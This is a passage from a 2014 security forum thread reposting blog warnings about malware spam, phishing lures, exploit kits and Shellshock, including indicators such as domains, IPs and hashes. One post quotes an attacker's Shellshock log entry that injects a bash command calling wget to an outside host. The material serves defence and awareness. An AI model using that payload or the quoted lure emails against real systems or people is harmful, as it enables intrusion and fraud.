Page 54 of 132 FirstFirst ... 44450515253545556575864104 ... LastLast
Results 531 to 540 of 1320

Thread: SPAM frauds, fakes, and other MALWARE deliveries...

  1. #531
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Fake 'Voice Mail' SPAM ...

    FYI...

    Fake 'Voice Mail' SPAM
    - http://blog.dynamoo.com/2014/09/acco...-have-new.html
    23 Sep 2014 - "This strangely titled spam leads to malware.
    From: Voice Mail
    Date: 23 September 2014 10:17
    Subject: You have a new voice
    You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
    * The reference number for this message is _qvs8213783583_001
    The transmission length was 78
    Receiving machine ID : R8KU-UY0G3-ONGH
    To download and listen your voice mail please follow the link ...
    The link to this secure message will expire in 24 hours ...


    The link in the email downloads a file from www .ezysoft .in/ocjnvzulsx/VoiceMail.zip which contains a malicious executable VoiceMail.scr which has a VirusTotal detection rate of 2/54*. According to this Anubis report** the malware attempts to phone home to very-english .co.uk which might be worth blocking."
    * https://www.virustotal.com/en-gb/fil...is/1411464313/

    ** http://anubis.iseclab.org/?action=re...7a&format=html

    - http://myonlinesecurity.co.uk/new-vo...e-pdf-malware/
    23 Sep 2014 - "... 23 Sep 2014: VoiceMail.zip (9kb): Extracts to: VoiceMail.scr Current Virus total detections: 2/54*
    * https://www.virustotal.com/en-gb/fil...is/1411464313/
    ___

    jQuery.com compromised to serve malware via drive-by download
    - http://www.net-security.org/malware_news.php?id=2869
    23.09.2014 - "jQuery.com, the official website of the popular cross-platform JavaScript library of the same name, had been compromised and had been -redirecting- visitors to a website hosting the RIG exploit kit and, ultimately, delivering information-stealing malware. While any website compromise is dangerous for users, this one is particularly disconcerting because of the demographic of its users... The attack was first detected on September 18, and given that the malicious redirector was hosted on a domain that was registered on the same day, it's more than likely that that was the day when the attack actually started. RiskIQ researchers* have immediately notified the jQuery Foundation about the compromise, and the site's administrators have -removed- the malicious script. The bad news is that they still don't know how the compromised happened, so it just might happen again. Users who have visited the site on or around September 18 are advised to check whether they have been compromised by the malware. The researchers recommend immediately re-imaging of the system, resetting passwords for user accounts that have been used on it, and checking whether suspicious activity has originated from it (data exfiltration, etc.). The only good news in all of this is that there is no indication that the jQuery library was affected."
    * http://www.riskiq.com/resources/blog...-accounts-risk

    >> https://blog.malwarebytes.org/?s=RIG+exploit+kit

    - https://isc.sans.edu/diary.html?storyid=18699
    2014-09-23

    46.182.31.77: https://www.virustotal.com/en/ip-add...7/information/
    ___

    Nuclear Exploit Kit evolves, includes Silverlight Exploit
    - http://blog.trendmicro.com/trendlabs...light-exploit/
    Sep 23, 2014 - "... We observed that the Nuclear Exploit Kit exploit kit recently included the Silverlight exploit (CVE-2013-0074*) in its scope. We believe that the attackers behind the Nuclear Exploit Kit included Silverlight in its roster of targeted software for two reasons: to have an expanded attack surface and to avoid detection (as not many security solutions have detections for this particular exploit)... This particular exploit has also been used in other exploit kits, such as the Angler Exploit Kit... Microsoft has released a bulletin (Microsoft Security Bulletin MS13-022) to address the associated vulnerability... The number of exploits used by the kit has -doubled- since the start of 2014...
    Timeline of exploits used by the Nuclear Exploit Kit:
    > http://blog.trendmicro.com/trendlabs...imeline-01.jpg
    Vulnerabilities targeted by the current Nuclear Exploit Kit:
    > http://blog.trendmicro.com/trendlabs...ploit_fig4.png
    ... patches have already been released for the vulnerabilities targeted by the Nuclear Exploit Kit..."
    * https://web.nvd.nist.gov/view/vuln/d...=CVE-2013-0074 - 9.3 (HIGH)

    Last edited by AplusWebMaster; 2014-09-24 at 15:40.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  2. #532
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Fake BankLine, Voice mail, Invoice SPAM, AMEX Phish ...

    FYI...

    Fake BankLine SPAM
    - http://blog.dynamoo.com/2014/09/you-...e-message.html
    24 Sep 2014 - "This -fake- BankLine email leads to malware that is not currently detected by any anti-virus engine:
    From: Bankline [secure.message@ bankline .com]
    Date: 24 September 2014 09:59
    Subject: You have received a new secure message from BankLine
    You have received a secure message.
    Read your secure message by following the link bellow ...
    You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
    If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk ...
    First time users - will need to register after opening the attachment...


    The link in the email goes to ismashahalam .net/xyzpayohjx/ngkzoeqjjs.html which downloads an archive file from ismashahalam .net/xyzpayohjx/SecureMessage.zip. This in turn contains a malicious file SecureMessage.scr which has a VirusTotal detection rate of 0/50*. The Anubis report** shows that the malware phones home to very-english .co.uk which is worth blocking or monitoring."
    * https://www.virustotal.com/en-gb/fil...is/1411546325/

    ** https://anubis.iseclab.org/?action=r...ef&format=html

    - http://myonlinesecurity.co.uk/receiv...e-pdf-malware/
    24 Sep 2014 - "... 24 Sep 2014: SecureMessage.zip: Extracts to: SecureMessage.scr
    Current Virus total detections: 7/54*..."
    * https://www.virustotal.com/en/file/2...is/1411565004/
    ... Behavioural information
    UDP communications
    137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
    ___

    Fake Voice mail SPAM
    - http://myonlinesecurity.co.uk/inclar...e-wav-malware/
    24 Sep 2014 - "'Voice Message Attached from 01636605058 – name unavailable' pretending to come from voicemail@ inclarity .net is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Time: Sep 23, 2014 10:50:00 AM
    Click attachment to listen to Voice Message


    24 September 2014: 01636605058_20140919_105000.wav.zip: Extracts to: 01636605058_20140919_105000.wav.exe
    Current Virus total detections: 12/53*
    This 'Voice Message Attached from 01636605058 – name unavailable' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( (sound) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/4...is/1411568872/
    ... Behavioural information
    UDP communications
    137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
    ___

    Fake 'overdue invoice' SPAM – malware
    - http://myonlinesecurity.co.uk/remind...voice-malware/
    24 Sep 2014 - "'Reminder of overdue invoice' pretending to come from a random name at a random company and with a random named attachment is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... different subjects with this one having different numbers including:
    Reminder of overdue invoice: 708872110964932
    Overdue Payment: 122274492356288
    Due Date E-Mail Reminder: 417785972641224
    Payment reminder: 461929101577209
    Past Due Reminder Letter: 199488661953143
    Bills Reminder: 325332051074690
    Automatic reminder: 676901889653218
    Late payment: 475999033756578
    Reminder: 215728756825356

    The email looks like:
    Hello,
    This is Rex from Olympus Industrial. After a review of our records, we have found your account is past due.
    Account ID: 5FCDMF9. This notice is a reminder your payment is due.
    Regards,
    Rex Gloeckler
    Olympus Industrial...


    24 September 2014: application_708872110964932_5FCDMF9.rar:
    Extracts to: application_708872110964932_5FCDMF9.exe
    Current Virus total detections: 3/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/d...is/1411570178/
    ... Behavioural information
    TCP connections
    157.56.96.53: https://www.virustotal.com/en/ip-add...3/information/
    213.186.33.19: https://www.virustotal.com/en/ip-add...9/information/
    95.101.0.97: https://www.virustotal.com/en/ip-add...7/information/
    213.186.33.17: https://www.virustotal.com/en/ip-add...7/information/
    195.60.214.11: https://www.virustotal.com/en/ip-add...1/information/
    ___

    Fake AMEX Phish - 'Home Depot Security concern'
    - http://myonlinesecurity.co.uk/americ...epot-phishing/
    24 Sep 2014 - "We are seeing quite a few American Express phishing attempts trying to get your American Express details. These are very well crafted and look identical to genuine American Express emails. The senders appear to be from American Express until you look carefully at the email headers. Do -not- click -any- links in these emails... Today’s version is the 'American Express – Security concern on Data breach at Home Depot' which is a change to previous versions to attempt to make it more believable and attractive for you to click the link & give your details. They are using the recent Home Depot hack and consequent fraudulent transactions* that are being taken from many victims accounts to scare you into ignoring the usual precautions and get you to give them your details:
    * http://www.cnbc.com/id/102027452
    Email looks like:
    [ AMEX logo ]
    Dear Customer:We are writing to you because we need to speak with you regarding a security concern on your account. The Home Depot recently reported that there was unauthorized access to payment data systems at its U.S. stores. American Express has put fraud controls in place and we continue to closely monitor the situation. Our records indicate that you recently used your American Express card on September 19, 2014.
    We actively monitor accounts for fraud, and if we see unusual activity which may be fraud, our standard practice is to immediately contact our Card Members. There is no need to call us unless you see suspicious activity on your account.
    To ensure the safety of your account , please log on to : ...
    Regularly monitor your transactions online at americanexpress .com. If you notice fraudulent transactions, visit our online Inquiry and Dispute Center
    Enroll in Account Alerts that notify you via email or text messages about potentially fraudulent activities.
    Switch to Paperless Statements that are accessible online through your password-protected account.
    Your prompt response regarding this matter is appreciated.
    Sincerely,
    American Express Identity Protection Team ...


    Following the link in this 'American Express – Security concern on Data breach at Home Depot' or other -spoofed- emails takes you to a website that looks -exactly- like the real American Express site. You are then led through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your American Express account, but also your Bank Account, Email details, webspace (if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. Please read our How to protect yourselves page** for simple, sensible advice on how to avoid being infected or having your details stolen by this sort of socially engineered malware..."
    ** http://myonlinesecurity.co.uk/how-to...hten-security/

    - http://threattrack.tumblr.com/post/9...dentials-phish
    Sep 24, 2014
    Screenshot: https://gs1.wac.edgecastcdn.net/8019...PiQ1r6pupn.png
    Tagged: AMEX, American Express, Home Depot, Credentials Phish
    ___

    Netcraft Sep 2014 Web Server Survey
    - http://news.netcraft.com/archives/20...er-survey.html
    24 Sep 2014 - "In the September 2014 survey we received responses from 1,022,954,603 sites — nearly 31 million more than last month. This is the first time the survey has exceeded a -billion- websites, a milestone achievement that was unimaginable two decades ago. Netcraft's first ever survey was carried out over 19 years ago in August 1995. That survey found only 18,957 sites, although the first significant milestone of one million sites was reached in less than two years, by April 1997..."
    ___

    Viator(dot)com - Data Compromise ...
    - https://blog.malwarebytes.org/online...-you-affected/
    Sep 23, 2014 - "You may well be seeing an email appearing in your inbox from Viator .com, a website designed to help you find tours and trips overseas with none of the typical messing about such tasks usually involve. The emails have been sent out because it appears they had a breach* and anything up to 1.4 million customers may have been potentially impacted by the compromise...
    * http://www.viator.com/about/media-ce...leases/pr33251
    Sep 19, 2014

    ... the bad news is that the breach took place a good few weeks ago yet we’re only just hearing about it... there doesn’t appear to have been a massive file posted online yet containing data such as PII related to the compromise... we await more information on this latest high-profile attack."
    ___

    Malvertising campaign - involving DoubleClick and Zedo
    - https://blog.malwarebytes.org/malver...lick-and-zedo/
    Sep 18, 2014
    Update (09/19/14 9:20 AM PT): It appears that the malicious redirection has stopped. Last activity was detected by our honeypots around midnight last night, and nothing else since then. We are still monitoring the situation and will update here if necessary."

    - http://arstechnica.com/security/2014...ched-millions/
    Sep 22 2014

    Last edited by AplusWebMaster; 2014-09-25 at 05:37.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  3. #533
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Fake Bank transfers/invoice SPAM ...

    FYI...

    Fake Bank transfers/invoice SPAM ...
    - http://blog.dynamoo.com/2014/09/malw...sfer-sage.html
    25 Sep 2014 - "... very aggressive spam run this morning, with at least -four- different email formats pushing the -same- malicious download.

    RBS / Riley Crabtree: "BACS Transfer : Remittance for JSAG814GBP"
    From: Riley Crabtree [creditdepart@ rbs .co.uk]
    Date: 25 September 2014 10:58
    Subject: BACS Transfer : Remittance for JSAG814GBP
    We have arranged a BACS transfer to your bank for the following amount : 4946.00
    Please find details at our secure link ...

    Sage Account & Payroll: "Outdated Invoice"
    From: Sage Account & Payroll [invoice@ sage .com]
    Date: 25 September 2014 10:53
    Subject: Outdated Invoice
    Sage Account & Payroll
    You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link ...

    Screenshot: https://1.bp.blogspot.com/-8Mx-CTYIi...1600/sage2.png

    Lloyds Commercial Bank: "Important - Commercial Documents"
    From: Lloyds Commercial Bank [secure@ lloydsbank .com]
    Date: 25 September 2014 11:36
    Subject: Important - Commercial Documents
    Important account documents
    Reference: C400
    Case number: 05363392
    Please review BACs documents.
    Click link below ...

    NatWest Invoice: "Important - New account invoice
    From: NatWest Invoice [invoice@ natwest .com]
    Date: 25 September 2014 10:28
    Subject: Important - New account invoice
    Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
    To view/download your invoice please click here ...


    The links in the emails go to different download locations to make it harder to block... In each case the page then downloads the victim to download file Invoice_09252014.zip from the same directory as the html file. This ZIP file contains a malicious executable Invoice_09252014.scr which currently has a VirusTotal detection rate of 3/54*. The Anubis report shows that it phones home to ukrchina-logistics .com which is probably worth blocking or monitoring access to."
    * https://www.virustotal.com/en-gb/fil...is/1411638249/
    ... Behavioural information
    DNS requests
    ukrchina-logistics .com
    TCP connections
    188.165.198.52: https://www.virustotal.com/en-gb/ip-...2/information/
    91.196.0.119

    - http://threattrack.tumblr.com/post/9...e-invoice-spam
    Sep 25, 2014
    Screenshot: https://gs1.wac.edgecastcdn.net/8019...1ql1r6pupn.png
    Tagged: Sage, Upatre
    ___

    Fake BCA SPAM - PDF malware
    - http://myonlinesecurity.co.uk/bca-ba...e-pdf-malware/
    25 Sep 2014 - "'BCA Banking 24.09.14' pretending to come from hallsaccounts <hallsaccounts@ hallsgb .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Accounts Dept
    Halls Holdings Ltd
    Tel: 01743 450700
    Fax: 01743 443759 ...


    25 September 2014: BCA Banking 24.09.14.pdf.zip : Extracts to: BCA Banking 24.09.14.pdf.exe
    Current Virus total detections: 4/53* . This BCA Banking 24.09.14 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an image of a barcode to try to fool you instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/c...is/1411646762/
    ... Behavioural information
    UDP communications
    137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
    ___

    Fake voice mail SPAM – wav malware
    - http://myonlinesecurity.co.uk/outloo...e-wav-malware/
    25 Sep 2014 - "'You have received a voice mail' pretending to come from Microsoft Outlook [no-reply@ Your domain] is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    You received a voice mail : VOICE7838396453.wav (26 KB)
    Caller-Id: 7838396453
    Message-Id: ID9CME
    Email-Id: [redacted]
    This e-mail contains a voice message.
    Download and extract the attachment to listen the message.
    Sent by Microsoft Exchange Server


    25 September 2014 VOICE7838396453.zip (56kb): Extracts to: voicemessage.scr
    Current Virus total detections: 1/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/c...is/1411657167/
    ... Behavioural information
    TCP connections
    23.21.52.195: https://www.virustotal.com/en/ip-add...5/information/
    95.100.255.137: https://www.virustotal.com/en/ip-add...7/information/
    194.150.168.70: https://www.virustotal.com/en/ip-add...0/information/
    UDP communications
    137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
    ___

    Fake Gov't e-mail SCAM
    - https://www.ic3.gov/media/2014/140924.aspx
    Sep 24, 2014 - "Cybercriminals posing as Internet Crime Complaint Center (IC3) employees are defrauding the public. The IC3 has received complaints from victims who were receiving e-mails purported to be from the IC3... Victims report that the unsolicited e-mail sender is a representative of the IC3. The e-mails state that a criminal report was filed on the victim’s name and social security number and legal papers are pending. Scammers impersonate an IC3 employee to increase credibility and use threats of legal action to create a sense of urgency. Victims are informed they have one to two days from the date of the complaint to contact the scammers. Failure to respond to the e-mail will result in an arrest warrant issued to the victim. Some victims stated they were provided further details regarding the ‘criminal charges’ to include violations of federal banking regulations, collateral check fraud, and theft deception. Other victims claimed that their address was correct but their social security number was incorrect. Victims that requested additional information from the scammer were instructed to obtain prepaid money cards to avoid legal action. Victims have reported this -scam- in multiple states... If you receive this type of e-mail:
    - Resist the pressure to act quickly.
    - -Never- wire money based on a telephone request or in an e-mail, especially to an overseas location.
    The IC3 -never- charges the public for filing a complaint and will -never- threaten to have them arrested if they do not respond to an e-mail..."

    Last edited by AplusWebMaster; 2014-09-25 at 23:33.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  4. #534
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Amazon phish, Fake docs, voicemail, fax SPAM ...

    FYI...

    Amazon phish ...
    - http://myonlinesecurity.co.uk/amazon...tion-phishing/
    26 Sep 2014 - "'Account Confirmation' pretending to come from Amazon .co.uk <auto-confirm@ amazon .co.uk> is a phishing email designed to get your Amazon log in details and then your bank, credit card, address and personal details so they can imitate you and take over your accounts and clean you out...

    Screenshot: http://myonlinesecurity.co.uk/wp-con...nfirmation.png

    Following the link in this Amazon Account Confirmation or other spoofed emails takes you to a website that looks -exactly- like the real Amazon.co.uk site. You are then through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Amazon account, but also your Bank Account, Email details, webspace (if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them ..."
    ___

    Fake docs, voicemail, fax SPAM ...
    - http://blog.dynamoo.com/2014/09/malw...documents.html
    26 Sep 2014 - "... different types of spam to increase click through rates and now some tricky tools to prevent analysis of the malware.

    Employee Documents - Internal Use
    From: victimdomain
    Date: 26 September 2014 09:41
    Subject: Employee Documents - Internal Use
    DOCUMENT NOTIFICATION, Powered by NetDocuments
    DOCUMENT NAME: Employee Documents ...
    Documents are encrypted in transit and store in a secure repository...

    You have a new voice
    From: Voice Mail [Voice.Mail@ victimdomain]
    Date: 26 September 2014 09:30
    Subject: You have a new voice
    You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
    * The reference number for this message is _qvs4004011004_001
    The transmission length was 26
    Receiving machine ID : ES7D-ZNA1D-QF3E
    To download and listen your voice mail please follow the link ...

    RBS: BACS Transfer : Remittance for JSAG244GBP
    From: Douglas Byers [creditdepart@ rbs .co.uk]
    Date: 26 September 2014 10:12
    Subject: BACS Transfer : Remittance for JSAG244GBP
    We have arranged a BACS transfer to your bank for the following amount : 4596.00
    Please find details at our secure link ...

    New Fax
    From: FAX Message [fax@victimdomain]
    Date: 26 September 2014 10:26
    Subject: New Fax
    You have received a new fax .
    Date/Time: Fri, 26 Sep 2014 16:26:36 +0700.
    Your Fax message can be downloaded here ...


    ... The attack has evolved recently.. usually these malicious links forwarded on to another site which had the malicious payload. Because all the links tended to end up at the same site, it was quite easy to block that site and foil the attack. But recently the payload is spread around many different sites making it harder to block. A new one today is that the landing page is somewhat obfuscated to make it harder to analyse, and this time the download is a plain old .scr file rather than a .zip. I've noticed that many anti-virus products are getting quite good at detecting the malicious ZIP files with a generic detection, but not the binary within. By removing the ZIP wrapper, the bad guys have given one less hook for AV engines to find.. malicious binary document7698124-86421_pdf.scr is downloaded from the remote site which has a VirusTotal detection rate of 2/55*. The Anubis report shows the malware attempting to phone home to padav .com which is probably worth blocking."
    * https://www.virustotal.com/en-gb/fil...is/1411724904/
    ... Behavioural information
    DNS requests
    padav .com (184.106.55.51)
    TCP connections
    188.165.198.52: https://www.virustotal.com/en-gb/ip-...2/information/
    184.106.55.51: https://www.virustotal.com/en-gb/ip-...1/information/
    UDP communications
    137.170.185.211: https://www.virustotal.com/en-gb/ip-...1/information/
    ___

    Bill.com Spam
    - http://threattrack.tumblr.com/post/9.../bill-com-spam
    Sep 26, 2014 - "Subjects Seen:
    Payment Details [Incident: 711935-599632]
    Typical e-mail details:
    We could not process your Full Payment Submission. The submission for reference ***/UT5236489 was successfully received and was not processed. Check attached copy (PDF Document) for more information.
    Regards,
    Bill.com Payment Operations


    Screenshot: https://gs1.wac.edgecastcdn.net/8019...HaW1r6pupn.png

    Malicious File Name and MD5:
    bill_com_Payment_Details_711935-599632.zip (02EE805D1EACD739BEF4697B26AAC847)
    bill_com_payment_details_ID0000012773616632715381235.pdf.exe (AD24CD2E14DCBF199078BDBBAE4BF0CA)


    Tagged: bill.com, Vawtrak
    ___

    More Fakes - HMRC, BT, RBS SPAM
    - http://blog.dynamoo.com/2014/09/malw...plication.html
    26 Sep 2014 - "Another bunch of spam emails, with the same payload* at this earlier spam run*.

    HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
    From: noreply@ taxreg .hmrc .gov.uk [noreply@ taxreg .hmrc .gov.uk]
    Date: 26 September 2014 12:26
    Subject: HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
    The application with reference number LZV9 0Q3E W5SD N3GV submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
    Please download/view your HMRC documents here ...

    Important - BT Digital File
    From: Cory Sylvester [Cory.Sylvester@ bt .com]
    Date: 26 September 2014 12:51
    Subject: Important - BT Digital File
    Dear Customer,
    This email contains your BT Digital File. Please scan attached file and reply to this email.
    To download your BT Digital File please follow the link ...

    RBS Bankline: Outstanding invoice
    From: Bankline.Administrator@ rbs .co.uk [Bankline.Administrator@ rbs .co.uk]
    To: <REDACTED>
    Date: 26 September 2014 13:05
    Subject: Outstanding invoice
    {_BODY_TXT}
    Dear [redacted],
    Please find the attached copy invoice which is showing as unpaid on our ledger.
    To download your invoice please click here ...


    In the sample I looked at the malware page downloaded an archive document26092014-008_pdf.zip which in turn contains document26092014-008_pdf.exe which is the same payload* as earlier..."
    * http://blog.dynamoo.com/2014/09/malw...documents.html
    ___

    Fake Barclays SPAM – PDF malware
    - http://myonlinesecurity.co.uk/barcla...e-pdf-malware/
    26 Sep 2014 - "'Barclays Transaction not complete' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Unable to complete your most recent Transaction. Currently your transaction has a pending status.
    If the transaction was made by mistake please contact our customer service.
    For more details please download payment receipt ...


    26 September 2014: PaymentReceipt262.zip: Extracts to: PaymentReceipt262.exe
    Current Virus total detections: 2/55* . This 'Barclays Transaction not complete' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/5...is/1411738617/
    ... Behavioural information
    DNS requests
    wcdnitaly .org (195.110.124.133)
    TCP connections
    188.165.198.52: https://www.virustotal.com/en/ip-add...2/information/
    195.110.124.133: https://www.virustotal.com/en/ip-add...3/information/
    UDP communications
    137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/

    Last edited by AplusWebMaster; 2014-09-26 at 21:19.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  5. #535
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Shellshock and MangoHost (mangohost .net) / 83.166.234.0/24

    FYI...

    Shellshock and MangoHost (mangohost .net) / 83.166.234.0/24
    - http://blog.dynamoo.com/2014/09/evil...mangohost.html
    28 Sep 2014 - "I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday... probing my server at attempting to WGET back to their own network to enumerate vulnerable hosts.
    dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http ://ad.dipad .biz/test/http ://dynamoo .com/\""
    ad.dipaz .biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range... MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova*. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau. Until the past few days, MangoHost was hosting the -ransomware- sites listed here** [pastebin]. Paste customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode .com, whatever that may be (you can guarantee it is nothing good). Currently hosted domains include a collection of -fake- browser plugins, some -malvertising- sites, some porn, spam sites, hacker resources, -ransomware- domains and what might appear to be some fake Russian law firms... I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it."
    (More detail at the dynamoo URL above.)
    * https://en.wikipedia.org/wiki/Russians_in_Moldova

    ** http://pastebin.com/2mC1pXaJ

    83.166.234.186: https://www.virustotal.com/en/ip-add...6/information/

    83.166.234.133: https://www.virustotal.com/en/ip-add...3/information/
    ___

    Shellshock in the Wild
    - http://www.fireeye.com/blog/uncatego...-the-wild.html
    Sep 27, 2014 - "... We have observed a significant amount of overtly malicious traffic leveraging BASH, including:
    - Malware droppers
    - Reverse shells and backdoors
    - Data exfiltration
    - DDoS
    Some of this suspicious activity appears to be originating from Russia. We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise... Exploitation Techniques: The Shellshock traffic we have been able to observe is still quite chaotic. It is largely characterized by high volume automated scans and PoC-like exploit scripts... payload is a very small ELF executable (md5: 959aebc9b44c2a5fdd23330d9be1101e) that was submitted to VirusTotal yesterday with 0 detections. It simply creates a reverse shell, connecting to the same IP the payload was downloaded from: 82.118.242.223... We will continue monitoring the threats and keep you updated..."
    (More detail at the fireeye URL above.)

    - http://www.symantec.com/connect/blog...-vulnerability
    Updated: 29 Sep 2014 - "... Businesses, in particular website owners, are most at risk from this bug and should be aware that its exploitation may allow access to their data and provide attackers with a foothold on their network. Accordingly, it is of critical importance to apply any available patches immediately. Linux vendors have issued security advisories for the newly discovered vulnerability including patching information.
    Debian: https://www.debian.org/security/2014/dsa-3032
    Ubuntu: http://www.ubuntu.com/usn/usn-2362-1/
    Red Hat: https://access.redhat.com/articles/1200223
    CentOS: http://centosnow.blogspot.com/2014/0...-centos-5.html
    Novell SUSE: http://support.novell.com/security/c...2014-6271.html
    *Red Hat has updated its advisory to include fixes for a number of remaining issues.
    - https://rhn.redhat.com/errata/RHSA-2014-1306.html
    Last updated on: 2014-09-30
    If a patch is unavailable for a specific distribution of Linux or Unix, it is recommended that users switch to an alternative shell until one becomes available.
    For consumers: Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available.
    Symantec Protection: Symantec has created an Intrusion Prevention signature for protection against this vulnerability:
    27907 - OS Attack: GNU Bash CVE-2014-6271
    > http://www.symantec.com/security_res...jsp?asid=27907
    Symantec will continue to investigate this vulnerability and provide more details as they become available."

    Last edited by AplusWebMaster; 2014-10-01 at 00:26.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  6. #536
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Fake SITA, Invoice, Bank SPAM

    FYI...

    Fake SITA SPAM - PDF malware
    - http://myonlinesecurity.co.uk/sita-u...e-pdf-malware/
    29 Sep 2014 - "'Remittance Advice !!!' pretending to come from SITA UK < info @sita .co.uk > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Please find attached folder for remittance advice and your outstanding statement from SITA UK.
    Please arrange to send over a credit note as indicated in the statement.
    Best Regards,
    Luis Shivani,
    Financial Controller
    SITA UK ...


    Update: a slightly revised email coming out now but still the -same- malware attachment
    Please find attached folder for remittance advice and your outstanding statement from SITA UK.
    Please arrange to send over a credit note as indicated in statement.
    Any queries please contact us on 01934-524004.
    Best Regards,
    Luis Shivani,
    Financial Controller
    SITA UK ...


    29 September 2014: Remittance-Advice.zip: Extracts to: Remittance-Advice.exe
    Current Virus total detections: 39/55* . This 'Remittance Advice !!!' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/d...is/1411951945/
    ... Behavioural information
    UDP communications
    137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
    ___

    Fake Invoice SPAM - XLS malware
    - http://myonlinesecurity.co.uk/invoic...e-xls-malware/
    29 Sep 2014 - "'Your Invoice from Complete Office Solutions' pretending to come from donotreply@ c-o-s .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Hi Please find attached your recent invoices/credits from Complete Office Solutions, if you have any queries please do not hesitate in contacting us on 01904 693696 or email on Julie.edkins@ wallisbusinessservices .co.uk

